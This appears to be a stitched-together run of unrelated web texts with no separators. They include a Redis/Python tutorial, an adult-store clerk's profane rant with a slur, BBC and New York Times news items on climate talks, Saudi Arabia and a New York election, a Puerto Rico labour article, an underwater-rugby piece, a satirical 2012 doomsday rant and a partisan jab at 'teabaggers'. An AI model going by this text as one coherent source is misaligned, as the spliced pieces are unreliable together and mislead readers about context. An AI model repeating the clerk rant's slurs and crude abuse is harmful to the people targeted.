For some one - off data transformation problems I never save any code at all — I run a couple of list comprehensions , dump the results out as JSON or CSV and leave it at that .
Redis is an excellent complement to this kind of programming .
I can run a long running batch job in one Python interpreter ( say loading a few million lines of CSV in to a Redis key / value lookup table ) and run another interpreter to play with the data that ’s already been collected , even as the first process is streaming data in .
I can quit and restart my interpreters without losing any data .
And because Redis semantics map closely to Python native data types , I do n’t have to think for more than a few seconds about how I ’m going to represent my data .
Here ’s a 30 second guide to getting started with Redis :
$ wget http://redis.googlecode.com/files/redis-1.01.tar.gz $ tar - xzf redis-1.01.tar.gz $ cd redis-1.01 $ make $ ./redis-server
And that ’s it — you now have a Redis server running on port 6379 .
No need even for a ./ configure or make install .
You can run ./ redis - benchmark in that directory to exercise it a bit .
Let ’s try it out from Python .
In a separate terminal :
$ cd redis-1.01 / client-libraries / python/ $ python >>> import redis >>> r = redis.
Redis( ) >>> r.info( ) { u'total_connections_received ' : 1 , ... } >>> r.keys ('*')
#
Show all keys in the database [ ] >>> r.set ( ' key - 1 ' , ' Value 1 ' ) ' OK ' >>> r.keys ('*') [ u'key - 1 ' ] >>> r. get ( ' key - 1' ) u'Value 1 '
Now let ’s try something a bit more interesting :
>>> r.push ( ' log ' , ' Log message 1 ' , tail = True ) >>> r.push ( ' log ' , ' Log message 2 ' , tail = True ) >>> r.push ( ' log ' , ' Log message 3 ' , tail = True ) >>> r.lrange ( ' log ' , 0 , 100 ) [ u' Log message 3 ' , u'Log message 2 ' , u'Log message 1 ' ] >>> r.push ( ' log ' , ' Log message 4 ' , tail = True ) >>> r.push ( ' log ' , ' Log message 5 ' , tail = True ) >>> r.push ( ' log ' , ' Log message 6 ' , tail = True ) >>> r.ltrim ( ' log ' , 0 , 2 ) >>> r.lrange ( ' log ' , 0 , 100 ) [ u' Log message 6 ' , u'Log message 5 ' , u'Log message 4 ' ]
That ’s a simple capped log implementation ( similar to a MongoDB capped collection ) — push items on to the tail of a ’ log ’ key and use ltrim to only retain the last X items .
You could use this to keep track of what a system is doing right now without having to worry about storing ever increasing amounts of logging information .
See the documentation for a full list of Redis commands .
I ’m particularly excited about the RANDOMKEY and new SRANDMEMBER commands ( git trunk only at the moment ) , which help address the common challenge of picking a random item without ORDER BY RAND ( ) clobbering your relational database .
In a beautiful example of open source support in action , I requested SRANDMEMBER on Twitter yesterday and antirez committed just 12 hours later .
I used Redis this week to help create heat maps of the BNP ’s membership list for the Guardian .
I had the leaked spreadsheet of the BNP member details and a ( licensed ) CSV file mapping 1.6 million postcodes to their corresponding parliamentary constituencies .
I loaded the CSV file in to Redis , then looped through the 12,000 postcodes from the membership and looked them up in turn , accumulating counts for each constituency .
It took a couple of minutes to load the constituency data and a few seconds to run and accumulate the postcode counts .
In the end , it probably involved less than 20 lines of actual Python code .
A much more interesting example of an application built on Redis is Hurl , a tool for debugging HTTP requests built in 48 hours by Leah Culver and Chris Wanstrath .
The code is now open source , and Chris talks a bit more about the implementation ( in particular their use of sort in Redis ) on his blog .
Redis also gets a mention in Tom Preston - Werner ’s epic writeup of the new scalable architecture behind GitHub .
QR Code Link to This Post
it 's NOT ok to contact this poster with services or other commercial interests
1 . I 'll say this one time only : we do not accept returns unless the movie you purchased is defective in some way .
This means the movie does n't play .
This does not mean that the video was not long enough , did n't feature enough fucking , did n't feature enough money shots , featured too many dicks and not enough pussy , featured too many pussies and not enough dicks or any other content - based complaint you may have .
You bought it , you wanked to it and now its yours .
Forever . kthxbye.2 .
If your movie is defective , you have two ( 2 ) days to return it with the receipt and original package .
This means if you purchase the movie on Monday morning , you have until Wednesday evening to bring it back .
This means when you return the movie , you have to have that little piece of paper we give you when we sell you the movie and the cover and box must be intact .
It 's possible , but very unlikely , that we did n't give you a receipt .
It 's impossible that you did n't get the packaging .
That 's just ridiculous .
Oh , and if you return a movie , I will put the movie in our DVD player to make sure it does n't work .
Yes , that 's right .
I 'm college educated and I get to check porn for defects at work .
My parents sure are proud .
3 . Seriously , who purchases porn anymore ?
Have you ever heard of the internet ?
Well , in case you have n't , it 's a magical series of tubes that gives you access to a plethora of pornography you cannot even imagine .
Pornography beyond your wildest dreams !
And , better yet , it 's free !
4 .
Seriously , who rents porn anymore ?
Please see # 3.5 .
Why are you so fucking picky about your pornography ?
I really do n't understand .
It 's a movie .
With people fucking each other .
A lot .
The movies are separated into broad genres in our movie section for your convenience .
You can find run of the mill people fucking each other a lot movies , movies with only black people fucking each other a lot , interracial groupings fucking each other a lot , only men fucking each other a lot , only women fucking each other a lot , people fucking each other a lot and doing kinky shit at the same time , and so on .
It 's pretty basic and usually , the titles describe what is going to happen in the movie pretty well .
" Big Black Poles in White Holes , " for instance , says a lot about what the movie will be about .
So do titles like " Giant Goo Covered Jugs , " " Girls Kissing Girls , " " Anal Addiction , " " Big Wet Asses , " " Enema Queens , " and " Hairy Cooter Bonanza . "
Usually , you do n't have to think a lot about what a movie is about ( other than fucking , of course ) - pornography is n't known for being demure .
6 .
I have not seen every movie in our collection so I can't tell you whether " Giant Greeze Covered Asses " is better than " Big Wet Booty Poppin ' Booty . "
To be honest , I do n't even like pornography .
Even if I did , I would n't tell you about my pornography watching habits .
Please use your own discretion in determining which movie is right for you .
7 . I can help you find movies by title , studio or star .
If you do n't have a specific title , studio or star you are looking for , please limit your question asking .
We have thousands of movies and I 'm not going to look through them to help you find a movie featuring double penetration , strap ons , interracial couplings , and hairy women covered in oil wearing rubber .
Take your specific fetishes to the internet .
Please see # 3 and 4.8 .
Some of you rent or purchase multiple movies every day or so .
Do you have a job ?
Do you do anything except watch porn ?
How have you not masturbated yourself retarded at this point ?
Seriously ... calm down a little bit and , for the love of God , save yourself some money and get a computer and internet access .
Thanks and have a nice day , Your Friendly Adult Store Clerk
Maths ' no better than in 1970s '
Tests showed pupils are now more familiar with decimals than fractions Pupils are no better at maths now than they were 30 years ago - despite a rise in exam grades , a study suggests .
Researchers asked 3,000 11 to 14 - year - olds in England to sit maths exams taken by pupils in 1976 , and compared their scores with the earlier results .
Analysis suggested there was little difference between the two generations .
But among pupils from the previous generation taking O - level maths , less than a quarter gained a C or above , compared to 55 % in GCSEs last year .
' Teaching to the test '
Dr Jeremy Hodgen , of King 's College , London , who led the research team , suggested the disparity between unchanged ability and the increase in grades was partly down to schools ' obsession with Sats results and league table positions .
He said : " There 's a great deal of teaching to the test , so that in trying to increase scores , schools develop an understandable focus on the test , so there 's a narrowing of the curriculum .
"
He also said mainstream schools today had a higher proportion of lower - achieving pupils , whereas in the 1970s many of these pupils would have been in special schools .
The researchers found some differences in the abilities of the two groups of pupils in different areas of mathematics .
Today 's secondary school pupils were much more familiar with decimals than they were 30 years ago .
On the other hand , fractions appeared to be much harder for today 's pupils , the study suggested .
The term grade inflation is a term which is referenced and it is used constantly
Carol Vorderman
Thirty years ago , pupils would sometimes convert decimals into fractions to solve a problem , but those taking the tests now did the reverse , researchers found .
Schools Minister Diana Johnson said another independent report showed pupils in England making real progress in maths and that GCSE standards were rigorously monitored .
" We do not think that research based on tests in a small number of specific topics taken in 11 schools by 11 to 14 - year - olds is a good way to judge standards in the maths GCSE - an exam which tests the full breadth of the curriculum and that is taken by older pupils from all schools in the country , " she said .
" Improved mathematics attainment is down to pupils ' hard work and excellent teaching .
This is further reflected by the fact that more and more young people are going on to study mathematics and further mathematics at AS - level and A - level . "
The research was presented at the British Educational Research Association conference in Manchester on Saturday .
Former Countdown television presenter Carol Vorderman , who is leading a Conservative task force into the subject , told BBC News that there was " no question " maths exams are easier than when she was at school .
" I 've spent a lot of the last month going round a lot of university maths departments and speaking to the professors and to the students ... and the term grade inflation is a term which is referenced and it is used constantly , " she said .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
It just wo n’t go away , this needling worry about the U.S. dollar losing its coveted top - dog status .
No matter that there are plenty of reasonable arguments to support the dollar as the world reserve currency — namely there ’s just no alternative — for perhaps decades to come .
Yet , in a world where once - rock - solid assumptions quickly turn to dust , investors should keep an eye on the dollar since changing perceptions are chipping away at its cherished status as currency to the world .
Much of the debate so far this year has centered on creating an alternative to the U.S. dollar , championed by China and Russia as a way to wean the world off its dependence on the U.S. as well as buffer individual nations against the missteps of those in developed world .
Most recognize creating a new currency will take years and the chances of an existing currency , like the yuan , usurping the dollar anytime soon are remote .
But that does n’t mean big money is n’t starting to prepare for world in which the buck is n’t the currency of choice .
Curtis Mewbourne , a portfolio manager at PIMCO , has suggested that investors diversify away from the dollar and to move into other currencies , especially those in emerging markets .
“ And while we have not yet reached the point where a new global reserve currency will arise , we are clearly seeing a loss of status for the U.S. dollar as a store of value even in the absence of a single viable alternative , ” he wrote in an article published on PIMCO ’s website .
Notwithstanding its big bounce during the financial maelstrom last year , the dollar has been on downward trajectory for most of this decade .
The U.S. dollar index , which currently stands around 78 , once traded well above 100 .
In the early days of the dollar ’s decline , currency traders worried about general diversification where central banks with big dollar reserves would begin to shave off a small portion of their holdings and exchange them for something else like euros .
The financial crisis , however , woke the world up to just how vulnerable those squirreling away dollars — like China and Russia — were to the fortunes of the United States .
The bulk of the world ’s currency reserves are in dollars , with the euro still a distant second .
Foreign central banks , however , could hardly start selling dollar - denominated assets to limit their exposure because such sales would cause prices on their remaining holdings to fall further .
So far , calls for alternative currencies have been seen as political posturing for both international and domestic audiences alike , but the United States .
has a lot to lose if it ever turns into something more concrete .
That ’s because the loss of reserve status means , among other things , that the United States would lose a crucial crutch that has allowed it to borrow its way into prosperity as well as out of depression with relative impunity .
Foreign investment in dollar assets have helped keep a cap on interest rates even though the government ’s borrowing binge in recent years has brought new meaning to the word stimulus .
In an op - ed published in the New York Times today , Warren Buffett railed against the flowing red ink that will push the nation ’s debt to roughly 56 percent of GDP from 41 percent in this fiscal year .
Presumably this is something that has also caught the eye of foreign investors .
While the greenback is likely to stay on top for some years , persistent concerns about its reserve status and moves to diversify away from it could usher in a new era for U.S. borrowers , public and private alike — a more painful one where debt costs can no longer be offset by the kindness of foreign investment .
We take pride in our litigation victories and courtroom advocacy , but we also see ourselves as counselors and problem - solvers .
Our service to clients goes beyond strictly legal advice .
What if your child needs counseling during a family conflict ?
What if you need to appraise your business ?
What if you need to sell your house after divorce ?
Attorney Chris Adams is among the seventh generation of his family to live and work in Gwinnett County .
Our deep roots and strong ties across the community enable us to resolve those side issues or connect clients to reputable local professionals , businesses or legal specialists who can .
By Richard Black
Environment correspondent , BBC News website
Drought - stricken African nations are among those seeking climate " damages "
The latest round of UN climate talks in Bangkok has ended with deep divisions over the shape of a new global treaty .
Developing countries want an extension of the Kyoto Protocol ; but developed nations are arguing for a completely new agreement .
Poorer countries and environment groups accuse the west of lacking ambition .
There are now only five negotiating days left until the opening of the UN summit in Copenhagen in December that is supposed to finalise the new treaty .
" Just two months before Copenhagen , the Bangkok climate negotiations did little to move the ball forward , " said Alden Meyer , director of strategy and policy at the Union of Concerned Scientists and a leading light in the international climate campaign TckTckTck .
What we must do now is to hold back from self interest and let the common interest prevail
Yvo de Boer " Bold steps are clearly needed from the world 's leaders to break the deadlock in the negotiations , and time is running short . "
The fortnight of talks in Bangkok began with negotiators looking at about 200 pages of text with 2,000 items that had yet to be agreed .
Progress has been made during the session , said delegates , but fundamental divisions remained .
" This session has shown that it can be done , " said Yvo de Boer , executive secretary of the UN climate convention ( UNFCCC ) .
" All of the ingredients for success are on the table , and what we must do now is to hold back from self interest and let the common interest prevail . "
Three - way split
The proposed new treaty 's legal form has emerged as a significant issue .
Three options were on the table , said Mr de Boer : a completely new document , an extension of the Kyoto Protocol , or a " series of decisions " made at the Copenhagen talks .
This is much more than a technical issue .
Developing countries insist on the Kyoto Protocol route because of the obligations it already contains on developed nations - to cut emissions further than their existing pledges ( which run to 2012 , the end of the " first commitment period " ) and to provide finance for poorer countries .
CLIMATE CHANGE GLOSSARY
Glossary in full " We have been dismayed by the lack of willingness by several of our developed country partners to move in this direction , " said Shyam Saran , leader of India 's delegation .
" It is a matter of regret that several ( developed ) countries are unlikely to meet their emission reduction obligations for the first commitment period .
" And [ it is ] a matter of even deeper concern than there has been no progress on achieving the key objective of our negotiations - the announcement of second commitment period targets which must be of a scale equal to the challenge we face of global climate change . "
Insistence on putting a new agreement inside the Kyoto Protocol framework could , though , prevent any chance of US involvement .
The US Senate did not ratify the Kyoto treaty and would be unlikely to ratify a new agreement built on its principles .
' Foot dragging '
Environment groups , too , had hoped that developed countries would come forward with stronger commitments on reducing emissions and on providing money to help poorer nations adapt to climate impacts .
Norway pledged to reduce its emissions by 40 % from 1990 levels by 2020 - the strongest pledge by any country so far .
US ' crucial ' for climate talks
But campaigners accused others , notably the EU , of using the absence of a firm US commitment as an excuse for dragging their own feet .
Legislation mandating emission cuts has yet to pass through the US Senate , and may not go through before the Copenhagen talks .
" Other countries are using the US 's position as an opportunity to try and avoid stringent legally binding emissions cuts which they should implement at home , " said Meena Raman from Friends of the Earth Malaysia .
" So far it looks like the Copenhagen talks could deliver a toothless agreement based on vague pledges that cannot deliver the deep greenhouse cuts that science and justice demand of rich nations . "
Delegates convene again in Barcelona at the beginning of November for a further week of negotiations - the final round before the Copenhagen summit .
Mr de Boer noted that at the UN special session on climate change held in New York last month , heads of government had given a " clear mandate " to reach a firm climate deal this year .
But , he said , this needed to be translated into stronger ambitions within the detailed negotiations .
Richard .
Black-INTERNET@bbc.co.uk
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Mr. Hoffman , though running as a Conservative , had been endorsed by some Republican luminaries , including Sarah Palin , the party ’s 2008 vice - presidential nominee , and Gov. Tim Pawlenty of Minnesota , a likely candidate for president in 2012 .
The swell of opposition to Ms. Scozzafava was reflected on conservative radio talk shows and in a heavy diet of television ads supporting Mr. Hoffman that were financed by conservative groups .
Mr. Pawlenty said he was heartened that Ms. Scozzafava had stepped aside .
“ I ’m glad Republicans are uniting behind a candidate who understands the federal government needs to quit spending so much , ” he said .
Ms. Scozzafava did not say whom , if anyone , she would endorse .
Polls showed that Mr. Owens and Mr. Hoffman were each drawing about 35 percent of the vote , while Ms. Scozzafava had around 20 percent .
Several Republicans said that at least in theory , her withdrawal should help Mr. Hoffman as Republican voters join his campaign .
Mr. Hoffman , who appeared before a crowd of about 100 cheering supporters on Saturday afternoon at a Veterans of Foreign Wars hall in Plattsburgh , said he believed victory was within his grasp .
“ We have to finish this race fighting like the underdog , ” he said .
“ We have to unite the Republicans , unite the independents and the Democrats who have had enough . ”
The district has been solidly Republican since the 19th century , and had been represented by John M. McHugh , who stepped down after Mr. Obama named him secretary of the Army .
“ In recent days , polls have indicated that my chances of winning this election are not as strong as we would like them to be , ” Ms. Scozzafava said in a statement .
“ The reality that I ’ve come to accept is that in today ’s political arena , you must be able to back up your message with money .
And as I ’ve been outspent on both sides , I ’ve been unable to effectively address many of the charges that have been made about my record . ”
Her departure is a clear victory for conservatives at a time when there has been a pitched battle among party leaders over whether Republicans needed to change their ideological appeal as part of an effort to recover from the losses of 2006 and 2008 .
By Sebastian Usher
BBC News
A female journalist in Saudi Arabia has been sentenced to 60 lashes over a TV show in which a Saudi man described his extra-marital sex life .
The programme , made by Lebanese satellite network LBC , caused a huge scandal in conservative Saudi Arabia when it was shown several months ago .
The journalist is one of two female LBC employees who have been arrested .
Mazen Abdul Jawad , the Saudi man who talked about how he picked up Saudi women for sex , has already been jailed .
The original programme was part of a series called Red Lines , made by the popular LBC network .
Saudi owner
It examined taboos in the Arab world .
Unmarried sex in Saudi Arabia amongst Saudis - rather than expatriates - is one of the biggest .
Mazen Abdul Jawad provoked outrage by describing his techniques for meeting and having sex with Saudi women .
He tearfully apologised but was jailed for five years and sentenced to 1,000 lashes .
Three of his friends who appeared on the show got two years each .
Mr Abdul Jawad blamed LBC producers for tricking him .
The station 's offices in Saudi Arabia were closed down and two of its producers - both female - put on trial .
LBC has made no comment about the cases .
It has long been attacked by Saudi religious leaders for being at the forefront of Arab satellite stations broadcasting programmes into the kingdom featuring scantily clad Arab singers and actresses .
Ironically , however , LBC is part - owned by the Saudi media mogul and billionaire Prince Alwaleed bin Talal .
" These images of the western portion of the Las Vegas metropolitan area show the city ’s steady spread into the adjacent desert landscape .
Undeveloped land appears along the left edges of the top two images .
Here , the land on the city ’s outskirts appears in shades of beige and tan , with just a hint of the street grid to come .
By 1989 , however , development filled the upper left corner — a residential area , complete with curving roads and semicircle streets .
In subsequent images , development spreads southward , and by 2004 , the entire image shows cityscape , including Interstate 215 passing through southwestern portion of the city . "
Here are some sobering satellite photos of Las Vegas , in five year intervals from 1984 to a few months ago , taken by NASA 's Landsat 5 .
For orientation , the strip runs north - south and with a NNE kink just right of center , with the airport parallel to this at bottom .
Interstate 215 can be found in the bottom left corner , taking shape in 1999 .
Click the animation for larger images .[ 25 years in six seconds | images from here ( via Coudal
LogoWatch A Missouri teenager is defying the might of clothing manufacturer The North Face , which is a bit hacked off at his " The South Butt " range of clobber .
The North Face Apparel Corp moved in August to eliminate the threat to its international business posed by 18 - year - old Jimmy Winkelmann and his company The South Butt , LLC .
Jordan LaVine , a lawyer acting for the company , sent Winkelmann a letter on 14 August insisting the rival logos are sufficiently similar to provoke " consumer confusion as to the source , sponsorship or affiliation of particular problems and services that could dilute or tarnish the distinctive quality of the famous and distinctive TNFAC marks " .
Winkelmann told ABC
News : " I was like , ' How did they even find me ? '
It was ridiculous . "
A fair question , since the enterprising teen 's business is a modest affair he set up two years ago after " he and his high school pals were poking fun at the kids at their private high school who satisfied their need to belong by buying the exact same jackets and vests " .
He explained : " People thought it was so cool to wear The North Face fleeces .
Everybody had to have them . "
Cue the " South Butt " idea , which started as a joke , then " just , like , escalated " .
Winkelmann raked in about $ 4 k in his first year , most of which went back into stock .
He says he 's pocketed around $ 2 k in the last year , which he 's spent on funding his biomedical engineering with a business minor studies at the University of Missouri .
Luckily for him , he wo n't need to splash out on legal fees .
He 's represented in his battle with The North Face by attorney Albert Watkins , who " plays squash with his client 's father and traded his services for a really good bottle of burgundy " .
On 10 September , Watkins replied to The North Face 's original cease - and - desist missive , defending : " I am compelled to respectfully disagree with the posture or assertion that ' The South Butt ' would in any way give rise to confusion on the part of any person .
" In fact , the sense of parody employed by Jimmy within the context of his South Butt undertakings clearly demonstrate a respectful , if not flattering ' anti- North Face ' posture designed in all respects to distinguish itself from any and all North Face products . "
Watkins also offered The North Face the chance to get its hands on The South Butt for $ 1 m - an offer which has now been withdrawn due to the former 's " lack of action " on the matter .
The North Face told ABC News in an email : " The North Face is all for creativity , ' butt ' we opposed Jimmy Winkelmann 's logo in order to protect our famous trademark .
And , just to be clear , we have not sued him .
" Like thousands of companies around the world , we work diligently to protect trademark rights .
This situation is , in reality , a serious problem companies deal with every day . "
Quite what The North Face does next remains to be seen .
Watkins said that any further legal action by company will only serve to " steel my client 's resolve to stand up and fight " .
Inevitably , the rumpus has seen The South Butt sales skyrocket .
Winkelmann says he sold around 200 items of clothing in the past two years , but had shifted the same amount in the last few days and is " now rushing to fill back orders and get new inventory manufactured " . ®
SAN JUAN , PUERTO RICO —
In 1934 , the year of the largest sugarcane workers ’ strike in Puerto Rican history , Antonio S. Pedreira , a wealthy writer and educator , described Puerto Ricans as lazy and irresponsible : “ To be lazy , in our country , is self - repression , lack of mental activity and freewill [ … ]
We are squatting before our future . ”
Seventy - five years later , the attitudes of Puerto Rico ’s ruling elite appear unchanged .
Faced with widespread opposition to plans by Gov. Luis Fortuño to fire tens of thousands of public - sector workers and privatize government services , members of the governor ’s staff have called working class Puerto Ricans “ ticks ” “ garrapata ” and terrorists and told them to accept privatization and layoffs because “ such is life . ”
Fortuño , leader of the Partido Nuevo Progresista ( the equivalent of the Republican Party ) , was inaugurated Jan. 2 , 2009 .
In his first 10 months in office he has fired more than 23,000 public - sector workers despite promising during his campaign that he would not make layoffs .
His announcement on Sept. 25 that he was firing nearly 17,000 workers spurred labor , student , religious and community groups to organize a general strike Oct. 15 .
Fortuño ’s administration reacted by stoking tensions .
Top law - enforcement officials including the justice secretary and police superintendent threatened to charge strikers with terrorism if they disrupted traffic at the island ’s ports .
Independent observers such as the American Civil Liberties Union described the government threats as “ dangerous ” and “ sowing fear . ”
The week before the general strike , 10 campuses of the University of Puerto Rico closed their doors to prevent student protesters from using the facilities to mobilize .
During democratic assemblies that gathered record numbers , students had already closed the main university campus in solidarity with fired government workers , including teachers , janitors and other service employees .
Despite the official intimidation , the demonstration and walkout went ahead Oct. 15 , drawing an estimated 200,000 people and shutting down most businesses , schools and government activities on the island .
During the protest , numerous workers said the massive layoffs were part an effort to “ sell the island , ” — to destroying public services in order to justify privatization and provide subsidies to companies owned by associates of the governor .
One marcher carried a sign calling the governor “ Fortocho , ” a mix of Pinocchio and Fortuño .
Another had a picture of the governor as a chicken with the question , “ What came first , the chicken or the egg ? ” referring to an unemployed worker who threw an egg at the governor during a press conference a few weeks earlier .
Others chanted : “ So , where ’s Fortuño ?
Fortuño is not here .
He ’s selling what is left of this country . ”
Many people showed their dissatisfaction by scrawling anti-privatization messages on buildings .
Others wore masks of the governor ’s face while they brandished fistfuls of money .
After the march , students blocked the country ’s largest highway and kept it closed until the police and some conservative leaders pressured them to abandon their efforts .
With a population of 3.5 million , Puerto Rico has been a U.S. colony since 1898 .
About 48 percent of the population lives under the poverty level and government layoffs , which represent about 12 percent of the public sector workforce , are projected to push the unemployment rate to 17 percent .
The firings were made possible by Law 7 , which passed in March .
It allows Fortuño to unilaterally dismiss public - sector workers , overriding labor laws that previously prohibited such actions .
Union contracts are no protection either , as Law 7 effectively voids any job protections they may contain .
What ’s more , Law 7 clears the way for firing more public - sector workers by allowing for “ Public - Private Alliances ” — a euphemism for handing over government functions to private corporations .
While the governor and pundits claim the mass layoffs are necessary because the government is “ too big ” and is facing a $ 3.2 billion budget deficit , Puerto Rico is slated to receive more than $ 5.7 billion in funds from the U.S. stimulus package passed earlier this year .
Fortuño also claims that private companies provide better services and that public - sector workers earn too much .
Previous governors used the same justification for prior rounds of privatization that ended in disaster .
Pedro Roselló , governor from 1992 to 2000 , privatized health services and sold hospitals .
While insurance companies fattened their profits by delaying payments and services , enabling them to earn interest on public funds , the population has seen co-pays increase and intolerable delays in basic and urgent care , as in the case of cancer patients .
Moreover , government officials under Roselló reportedly stole money from an organization that provided services for AIDS patients .
In 1998 , Roselló also sold Telefónica de Puerto Rico , a public telephone company , an action that triggered an enormous two - day general strike .
The following governor , Sila Calderón , the first female governor in the island ( 2000 to 2004 ) , outsourced billing services in the Public Water Authority to ONDEO , a French company , which failed to meet the terms of its contracts but was paid $ 540 million .
Aníbal Acevedo Vilá , the governor from 2004 to 2008 , privatized testing services in the Department of Education and signed numerous contracts for millions of dollars with charter school organizations while denying salary increases to public school teachers .
The independent teachers union , Federación de Maestros , staged a successful strike and won salary increases .
Puerto Rican workers have also seen massive layoffs in the private sector as the economy has been in recession for more than four years now .
The governor claims privatizing public services will create 200,000 new jobs by 2013 .
The government ’s development plans include promoting medical tourism ; privatizing much of the public energy authority ; displacing poor communities to build expensive apartments and shopping malls ; and a luxury resort , casino and marina on a former U.S. naval base .
Few believe Fortuño ’s promises , however , given the mass layoffs he claimed would never happen .
Laid - off workers have few options .
Even if they manage to land a job , an abysmal rate of private - sector unionism , less than 3 percent , means few protections .
Private companies will not recognize decades of service in the public sector , offer health insurance or match government salaries .
Meanwhile , despite promises of state support , fired workers wait in unemployment lines so long that people arrive the day before their appointment at the Labor Department to claim benefits ; their only alternative is accepting a government offer of $ 2,000 to leave the island .
While a large number of Puerto Rican workers and students are resolved to fight the government ’s policies , the movement is divided .
The ruling elite are banking on this .
Following the general strike , Fortuño ’s Chief of Staff , Rodríguez - Ema , said , “ I know we will prevail since the movement is divided . ”
The most conservative unions and political organizations are allies of the former ruling party ( Partido Popular Democrático , the equivalent of the Democrats ) .
The conservative unions , some of which seem most concerned with not losing union dues , are affiliated with large U.S. unions , such as the SEIU .
These unions are mostly organized under Law 45 , instituted in 1998 , which allowed for unionizing public - sector workers while taking away their right to strike .
Many of these workers had previously been in more militant labor “ associations . ”
Conservative and moderate groups are interested in getting concessions from the government even if this means reducing working hours for all public - service workers or eliminating the government ’s contribution to the workers ’ health insurance .
During the 1998 strike against the sale of the public telephone company , leaders in some of these unions and organizations demobilized a mass - based movement that put up to 500,000 people in the streets .
They negotiated a truce with the government , and the telephone company was finally sold .
While the Oct. 15 mobilization marked a big step forward , halting and reversing privatization will require a still higher level of struggle .
Independent unions , such as the university non-teaching employees union , called for a workers ’ party during the march .
The Federación de Maestros , the teachers ’ union that held a strike under the former administration ; the union of electric company workers ; and political organizations such as la Organización Socialista Internacional and the Movimiento Socialista de Trabajadores called for organizing from below .
These unions and political groups , together with other community organizations and university professors ( Asociación Puertorriqueña de Profesores Universitarios ) , have supported calling a general strike in the future .
Yolanda Rivera is a member of the Organización Socialista Internacional .
Lee Sustar contributed to this report .
While British divers invented underwaterhockey to spend the winter months their continental nemesis – Germany – found diving at winter temperatures equally unpleasant resulting in the invention of underwater rugby .
Simply exercising to maintain your physical fitness for only a few months of actual diving a year gets boring eventually , a problem solved creatively by inventing an underwater ball game combining the same physical exercise with team sport .
Initially only used as a warm up for the divers ’ winter training underwater ruby soon turned into a sport itself where teams of 12 – with only half the team in the field at any time as playing rugby while holding your breath can be quite exhausting – try to get the rugby ball into each others ‘ goal ’.. where it ’s doubtful the actual metal bucket is worthy of the word goal .
The ball itself is filled with salt water which is slightly heavier than normal water which means the ball will slowly sink to the bottom of the pool instead of floating on the surface .
An experienced underwater rugby player is capable of throwing – or thrusting – this ball only several meters because of the drag of the water .
Depths at which underwater rugby is played vary from about 3 to 5 meters depending on the pools used – few pools are constructed with underwater rugby in mind – making oxygen an important game factor .
As the game is intense a player will only be active for a short while before he has to before he has to breathe and whilst it is allowed to take the ball to the surface this immediately turns the entire opposing team into an obstacle whereas only a few will obstruct you underwater .
Use of 3 dimensions in combination with limited oxygen therefore turns this game into a complicated team sport where players have to keep all these things in – their oxygen - starved – mind .
Like real rugby underwater rugby is a contact sport which – despite the slowing drag of water and mixed teams – can get quite rough .
There are n’t too many rules and it is even allowed to sit in the goal bucket to prevent your enemy from scoring a point .
Check out the short video at the bottom …
This looks like a pretty terrible movie .
Let 's be honest , there 's going to be 25 to 30 minutes of widescreen destruction and then a plot and dialogue so formulaic as to be procedurally generated .
This flick , by comparison , looks totally awesome sweet , but I attribute that mainly to the largely bongo - oriented soundtrack .
Here 's the thing : 21st December 2012 represents a fairly major digit rollover in the Mesoamerican Long Count calendar .
It 's the Mayan Y2 K .
12.19.19.17.19 will roll over to 13.0.0.0.0 .
That is all .
We do n't use Mayan software .
We do n't use it because the original engineers who created that software were wiped out five hundred years ago and you can't get the support contracts anymore .
Even if we did all use Maya OS , we 'd just patch all the vulnerable systems and it would be a non-event like Y2 K was .
And even if we did n't do that , the failure of every computer on Earth would not bring about the fall of human civilisation because well over fifty percent of human civilisation still does n't rely on computers .
The reason I 'm talking about computing is because this is the only way that a major calendar digit rollover could possibly harm anyone or anything .
This is because dates are not real .
The real world does not care what year it is .
Do you have a desk calendar which ends on 31st December 2010 ?
OH NO IT'S THE END OF THE WORLD .
Dates and times are almost entirely arbitrary constructs , used by humans to provide a sensible , internally consistent reference framework for the recording of past events and the planning of future ones .
In theory , all events past and future could be described with reference to the present time ; " I was born 25 years ago " rather than " I was born in 1983 " .
But this makes it impossible to record time - sensitive data in a static format , such as written text ( a year from now , " I was born 25 years ago " will be incorrect ) , so instead we choose an arbitrary universally accepted reference point to start counting time from , an " epoch " , and then when I say " 1983 " I mean " 1,983 years after the epoch " and you understand that to be " 1,983 years after the epoch " and we are talking about the same year because we have the same definition of " the epoch " .
By choosing a different epoch or a different calendar system , any day you like can be 6/6/ 6 or the year 10000 or whatever number of significance you wish to generate .
What makes one epoch more significant than another ?
The fact that a lot of people use it ?
There are millions of people who use calendars other than the Common Era .
As for the number of people still using the Mesoamerican Long Count calendar , that is almost exactly zero .
A friend of mine created a decimal calendar which counts backwards .
To what ?
Nobody cares .
It 's superstition , like being frightened of the number 13 .
It 's numerology , it 's a distraction , and it 's passing the responsibility .
If you want the Earth to be destroyed , you can't just sit at home tabulating thousand - year - old religious texts for patterns which are n't there and then sit and wait for the moment when all your stupid graphs cross .
The end of the world is not something that happens because cosmic forces aligned and decided it was time for the world to end , and even if it was , figuring this fact out in advance would not hasten it .
The destruction of Earth is something that you go outside and invoke with your own two hands .
Make it happen .
Soon forthcoming in the top - ranked Quarterly Journal of Economics is a very well - received paper by four economists with convincing evidence of what many believe was the primary cause of the subprime boom and bust :
That securitization took away the incentive for lenders to properly vet borrowers .
But there 's some new evidence questioning the paper 's findings .
To understand the how and why , we have to get into the nitty - gritty of the empirics .
If you plot FICO ( i.e. , credit ) scores against the number of mortgages outstanding , you 'll notice a peculiar pattern :
Instead of a smooth curve , at certain FICO scores there are big jumps in the number of people with mortgages .
A September 9 report , Tea bagger bus company sued over blaze that killed 23 seniors , by Lindsay Beyerstein , links the bus company which carried the teabaggers across the country for the infamous Million Moran March in Washington DC with a whole stream of RNC connections , as well as a whole stream of outrageous safety violations :
In 2005 , a bus carrying seniors fleeing Hurricane Rita burst into flame outside of Dallas , immolating 23 nursing home residents .
Investigators later found that the bus was : driven by an undocumented migrant without a valid U.S. driver 's license , lacking adequate fire extinguishers , and not licensed to operate in Texas .
When the bus had mechanical problems before the crash , the driver took it to an unqualified mechanic who failed to notice the critical fault -- an unlubricated axle that eventually melted and burst into flame .
BusBank ( aka Global Charters ) hired the subcontractor , Global Limo .
BusBank boasted on its website that it had a " rigorous operator certification process " to ensure the safety of contracted bus drivers .
BusBank used Global even though the subcontractor had a long record of federal and state safety violations , had entered bankruptcy , and was being sued .
